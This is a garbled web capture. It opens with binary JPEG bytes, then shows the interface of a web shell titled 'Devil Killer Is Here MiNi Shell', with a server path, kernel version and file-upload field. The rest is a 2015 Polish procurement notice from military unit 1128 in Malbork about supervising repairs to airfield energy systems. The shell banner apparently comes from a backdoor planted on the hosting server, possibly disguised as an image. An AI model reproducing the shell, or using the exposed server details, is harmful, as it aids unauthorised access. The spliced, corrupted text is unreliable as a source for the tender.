JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151223/352270-N-2015.html

<p class="kh_header"><b>Malbork: Nadzór nad pracami serwisowymi i naprawami systemu energetycznego lotnisk
administrowanych przez Jednostkę Wojskową 1128 w Malborku</b><br>
<b>Numer ogłoszenia: 352270 - 2015; data zamieszczenia: 23.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 1128 , ul. 17 Marca 20, 82-200 Malbork, woj. pomorskie, tel. 261 536 216, 261 536 713, faks 261 536 275, 262 536 713.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.22blot.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nadzór nad pracami serwisowymi i naprawami systemu energetycznego lotnisk
administrowanych przez Jednostkę Wojskową 1128 w Malborku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest nadzór nad pracami serwisowymi i naprawami systemu energetycznego lotniska administrowanych przez Jednostkę Wojskową 1128 w Malborku. Zamówienie podzielone jest na dwa ZADANIA..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.33.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku na podstawie oświadczenia złożonego przez Wykonawcę (zgodnego z załącznikiem nr 4 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku na podstawie oświadczenia złożonego przez Wykonawcę (zgodnego z załącznikiem nr 4 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku na podstawie oświadczenia złożonego przez Wykonawcę (zgodnego z załącznikiem nr 4 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku na podstawie oświadczenia złożonego przez Wykonawcę (zgodnego z załącznikiem nr 4 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku na podstawie oświadczenia złożonego przez Wykonawcę (zgodnego z załącznikiem nr 4 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz ofertowy zgodny co do treści ze wzorem zawartym w załączniku nr 1 do SIWZ
Pełnomocnictwo osób podpisujących ofertę, o ile fakt nie wynika z przedstawionych dokumentów rejestrowych (oryginał lub kopia poświadczona notarialnie).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin płatności za fakturę - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający wymaga, aby wybrany Wykonawca zawarł z nim umowę na warunkach określonych w Projekcie umowy stanowiącym załącznik nr 5 do SIWZ.
2. Zamawiający zastrzega sobie, iż ostateczna treść umowy w stosunku do projektu umowy może ulec zmianie, jednakże wyłącznie w zakresie nie zmieniającym istotnych warunków złożonej oferty i SIWZ.
3. Zamawiający zgodnie z art. 144 Ustawy Prawo zamówień publicznych (tj. Dz. U. z 2013r., poz. 907 z późn. zm.) przewiduje możliwość wprowadzenia zmian do treści zawartej umowy w stosunku do treści oferty w zakresie:
a) Zmiany terminu wykonania przedmiotu umowy, oraz z zastrzeżeniem pkt. 4 i 5 w następującym zakresie:
- jeżeli umowa nie może być wykonana w terminie z przyczyn leżących po stronie Zamawiającego,
- jeżeli umowa nie może być wykonana w terminie z przyczyn niezawinionych przez Wykonawcę,
- działania siły wyższej, z zastrzeżeniem pkt. 7;
b) zmiany w zakresie wskazanych dla realizacji umowy Podwykonawców - w przypadku gdy w szczególności Podwykonawca wadliwie wykonuje umowę, w tym zaprzestał jej wykonywania lub w razie upadłości/likwidacji Podwykonawcy - w tym Podwykonawców na zasobach, których Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu pod warunkiem, że nowy Podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wymagane w SIWZ 
c) istotnych zmian w przepisach ustawowych i aktach wykonawczych związanych z przedmiotem zamówienia, które nastąpiły po dniu podpisania umowy. 
4. W przypadku wystąpienia którejkolwiek z okoliczności wymienionych ust. 3 lit. a) termin realizacji przedmiotu zamówienia może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia jego wykonywania w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności. Strony z powodów, jakie mogą wpływać na zmiany terminów wykonania usług, wyłączają niedogodności związane z pogodą, typową dla okresu wykonywania usług w miejscu prac. 
5. Strony ustalają nowe terminy realizacji zamówienia, z tym że maksymalny okres przesunięcia terminu zakończenia realizacji przedmiotu umowy będzie równy okresowi przerwy lub przestoju. Dodatkowo przyczyna i okres przesunięcia terminu będzie musiał być szczegółowo uzasadniony przez Wykonawcę i zaakceptowany przez Zamawiającego. 
6. O wystąpieniu jakichkolwiek okoliczności mogących wpłynąć na terminowość wykonania przedmiotu umowy Wykonawca jest zobowiązany powiadomić Zamawiającego na piśmie w terminie 7 dni od dnia wystąpienia tych okoliczności pod rygorem nieuwzględnienia ich przez Zamawiającego. 
7. Za siłę wyższą, o której mowa w niniejszej umowie, Zamawiający uzna zdarzenia nadzwyczajne, zewnętrzne o charakterze nadzwyczajnym, niezależne od woli Stron po zawarciu niniejszej umowy, które nie udało się zapobiec przy zachowaniu należytej staranności, skutkujące niemożliwością prowadzenia usługi, a w szczególności epidemią stwierdzoną przez uprawnione do tego organy lokalne lub państwowe, klęską żywiołową, strajkiem lub stanem wyjątkowym. 
8. Zmiana umowy powinna nastąpić w formie pisemnego aneksu sporządzonego przez Zamawiającego i podpisanego przez strony umowy, pod rygorem nieważności takiego oświadczenia oraz powinna zawierać uzasadnienie faktyczne i prawne.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.22blot.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 1128
ul. 17 Marca 20
82- 200 Malbork
sekcja zamówień publicznych bud. 12 pok. 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.01.2016 godzina 10:30, miejsce: Jednostka Wojskowa 1128
ul. 17 Marca 20
82- 200 Malbork
kancelaria jawna bud. 1 pok. 118.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Nadzór nad pracami serwisowymi i naprawami systemu energetycznego lotniska Malbork, K - 6010, Jednostka Wojskowa 1128 w Malborku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czynności wchodzące w skład usługi:
Zakres obowiązków inspektora nadzoru wynika z art. 25 ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (jednolity tekst: Dz. U. z 2013r., poz. 1409) i obejmuje w szczególności m.in.: 
a) Reprezentowanie interesów zamawiającego w czasie eksploatacji systemu energetycznego lotniska  w zakresie spraw technicznych i ekonomicznych w ramach dokumentacji eksploatacyjnej, prawa budowlanego oraz umowy o realizację serwisu sytemu. 
b) Dokonywanie sprawdzenia i weryfikacji dokumentacji technicznej, a w razie potrzeby wnioskowania do Zamawiającego o dokonanie w niej zmian lub uzupełnień, mając na względzie aspekty ekonomiczne, techniczne i użytkowe obiektu, 
c) Nadzorowanie prac serwisowych, których wykonanie określa dokumentacja projektowo - wykonawcza. 
d) Udział w czynnościach przekazania Wykonawcy zadania terenu budowy i udział w naradach  technicznych,
e) Sprawdzanie poprawności kalkulacji sporządzanych przez wykonawców robót w zakresie    obmiarów robót, nakładów rzeczowych, cen i narzutów oraz faktur w terminach wynikających z umów zawartych między wykonawcą, a zamawiającym. 
f) Kontrolowanie jakości wykonywanych robót, wbudowanych materiałów i ich zgodności z obowiązującymi normami, przepisami i specyfikacja techniczną i dokumentacją projektową. 
g) Kontrolowanie zgodności wykonywanych robót z dokumentacją projektową, umową i obowiązującym w trakcie realizacji harmonogramem robót. 
h) Rozstrzyganie - w uzgodnieniu z zamawiającym spraw technicznych powstałych w toku  wykonywania robót. 
i) Sporządzanie protokołów konieczności w przypadku potrzeby wykonywania robót dodatkowych lub zamiennych, uzasadnienie potrzeby wykonywania tych prac oraz wnioskowanie do zamawiającego o ich wykonanie. 
j) Kontrolowanie jakości oraz określania wartości materiałów uzyskanych z rozbiórki. 
k) Opiniowanie ofert materiałowych przedstawianych przez Wykonawcę.
l) Sprawdzanie wykonania robót zanikowych. 
ł) Uczestniczenie w odbiorach i próbach technicznych instalacji i urządzeń. 
m) Kompletowanie dokumentacji związanych z odbiorem końcowym. 
n) Potwierdzanie gotowości do odbioru robót lub obiektu.
o) Uczestniczenie w czynnościach odbioru obiektu lub robót i przekazania ich do użytku. 
p) Potwierdzanie rozliczenia  prac serwisowych i naprawczych.
r) Uczestniczenie w przeglądach w okresie gwarancji i rękojmi, oraz kontrolowanie usuwania ujawnionych wad i usterek. 
s) Pobyt na lotnisku Malbork  w czasie uzgodnionym z Zamawiającym, minimum 6 godzin w ciągu dnia, 4 razy  w miesiącu. Ponadto inspektor nadzoru  powinien być dostępny na każde zasadne wezwanie Zamawiającego lub Wykonawcy robót.
t) Informowanie zleceniodawcy na bieżąco o postępach w realizacji robót, stwierdzonych nieprawidłowościach lub zagrożeniach w realizacji robót wynikających z zatwierdzonego przez zleceniodawcę harmonogramu robót. 
u) Informowanie zleceniodawcy o terminach odbioru robót, których obowiązek odbioru spoczywa na zleceniobiorcy (ulegających zanikowi, częściowych, prób urządzeń i instalacji itp.) niezwłocznie po dokonaniu zgłoszenia odbioru przez wykonawcę robót, 
w) Branie udziału w naradach koordynacyjnych związanych z realizacją nadzorowanych robót,
x) Współpraca z komórkami organizacyjnymi Zamawiającego.
y) Sprawdzanie kosztorysów ofertowych  w obszarze elektrycznym,
z) Weryfikowanie ofert na zakup materiałów do dokonania napraw pod względem poziomu cen oraz jakości oferowanych materiałów.
q) Nadzorujący odpowiedzialny jest za wykonywanie prac związanych z nadzorem technicznym nad pracami serwisowymi i naprawami systemu energetycznego lotniska w tym praca z dokumentacją techniczną i formalno-prawną oraz  wykonywanie czynności nadzoru nad pracami montażowi  i rozruchowymi w obszarze elektrycznym (obwody pierwotne  i wtórne, w tym: zabezpieczenia elektryczne, układy sterowania elektrycznego, automatyki sterowania oraz pomiary).
WIZJA LOKALNA. 
Dopuszcza się możliwość dokonania wizji w terenie po uprzednim pisemnym powiadomieniu z dwu dniowym wyprzedzeniem w celu uzyskania zgody na wjazd na teren obiektu wojskowego, pismo powinno zawierać: cel wjazdu, termin, imię (imiona) i nazwisko (nazwiska) osób oraz markę i nr rejestracyjny pojazdu. Przedmiotowe pismo należy adresować: Dowódca Jednostki Wojskowej 1128, ul. 17 Marca 20, 82-200 Malbork i wysłać na fax: 261 536 275
W sprawie wizji lokalnej należy kontaktować się z upoważnionym przedstawicielem Zamawiającego w tym zakresie, którym jest: 
p. Henryk CHRZANOWSKI tel. 261 536 717 
Przed wykonywaniem prac należy:
a)Wjazd na teren lotniska uzgodnić z dwudniowym wyprzedzeniem pismem do Dowódcy  Jednostki Wojskowej 1128, fax: 261 536 275 podając:
- imię, nazwisko oraz nr dowodu osobistego operatora kierowcy,
- rodzaj pojazdu urządzenia oraz numer rejestracyjny.
b)Poruszanie po terenie lotniska odbywa się wyłącznie po wyznaczonych drogach.
c)Przed przystąpieniem do wykonania przedmiotu umowy zostanie przeprowadzone  szkolenie dotyczące zasad poruszania się po terenie lotniska oraz przestrzegania instrukcji FOD, które należy  bezwzględnie przestrzegać..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.33.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin płatności za fakturę - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Nadzór nad pracami serwisowymi i naprawami systemu energetycznego lotniska Pruszcz Gdański, K - 6034, Jednostka Wojskowa 1300 w Pruszczu Gdańskim.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czynności wchodzące w skład usługi:
Zakres obowiązków inspektora nadzoru wynika z art. 25 ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (jednolity tekst: Dz. U. z 2013r., poz. 1409) i obejmuje w szczególności m.in.: 
a) Reprezentowanie interesów zamawiającego w czasie eksploatacji systemu energetycznego lotniska  w zakresie spraw technicznych i ekonomicznych w ramach dokumentacji eksploatacyjnej, prawa budowlanego oraz umowy o realizację serwisu sytemu. 
b) Dokonywanie sprawdzenia i weryfikacji dokumentacji technicznej, a w razie potrzeby wnioskowania do Zamawiającego o dokonanie w niej zmian lub uzupełnień, mając  na względzie aspekty ekonomiczne, techniczne i użytkowe obiektu, 
c) Nadzorowanie prac serwisowych, których wykonanie określa dokumentacja projektowo - wykonawcza. 
d) Udział w czynnościach przekazania Wykonawcy zadania terenu budowy i udział w naradach  technicznych,
e) Sprawdzanie poprawności kalkulacji sporządzanych przez wykonawców robót w zakresie obmiarów robót, nakładów rzeczowych, cen i narzutów oraz faktur w terminach wynikających z umów zawartych między wykonawcą, a zamawiającym. 
f) Kontrolowanie jakości wykonywanych robót, wbudowanych materiałów i ich zgodności z obowiązującymi normami, przepisami i specyfikacja techniczną i dokumentacją projektową. 
g) Kontrolowanie zgodności wykonywanych robót z dokumentacją projektową, umową  i obowiązującym w trakcie realizacji harmonogramem robót. 
h) Rozstrzyganie - w uzgodnieniu z zamawiającym spraw technicznych powstałych w toku  wykonywania robót. 
i) Sporządzanie protokołów konieczności w przypadku potrzeby wykonywania robót dodatkowych lub zamiennych, uzasadnienie potrzeby wykonywania tych prac oraz wnioskowanie do zamawiającego o ich wykonanie. 
j) Kontrolowanie jakości oraz określania wartości materiałów uzyskanych z rozbiórki. 
k) Opiniowanie ofert materiałowych przedstawianych przez Wykonawcę.
l) Sprawdzanie wykonania robót zanikowych. 
m) Uczestniczenie w odbiorach i próbach technicznych instalacji i urządzeń. 
n) Kompletowanie dokumentacji związanych z odbiorem końcowym.
o) Potwierdzanie gotowości do odbioru robót lub obiektu. 
p) Uczestniczenie w czynnościach odbioru obiektu lub robót i przekazania ich do użytku. 
r) Potwierdzanie rozliczenia  prac serwisowych i naprawczych.
s) Uczestniczenie w przeglądach w okresie gwarancji i rękojmi, oraz kontrolowanie usuwania ujawnionych wad i usterek. 
t) Pobyt na lotnisku Pruszcz Gdański  w czasie uzgodnionym z Zamawiającym, minimum 6 godzin w ciągu dnia, 2 razy  w miesiącu. Ponadto inspektor nadzoru  powinien być dostępny  na każde zasadne wezwanie Zamawiającego lub Wykonawcy robót.
u) Informowanie zleceniodawcy na bieżąco o postępach w realizacji robót, stwierdzonych nieprawidłowościach lub zagrożeniach w realizacji robót wynikających z zatwierdzonego przez zleceniodawcę harmonogramu robót. 
w) Informowanie zleceniodawcy o terminach odbioru robót, których obowiązek odbioru  spoczywa na zleceniobiorcy (ulegających zanikowi, częściowych, prób urządzeń i instalacji itp.) niezwłocznie po dokonaniu zgłoszenia odbioru przez wykonawcę robót, 
x) Branie udziału w naradach koordynacyjnych związanych z realizacją nadzorowanych robót,
y) Współpraca z komórkami organizacyjnymi Zamawiającego.
z) Sprawdzanie kosztorysów ofertowych  w obszarze elektrycznym,
q) Weryfikowanie ofert na zakup materiałów do dokonania napraw pod względem poziomu cen oraz jakości oferowanych materiałów.
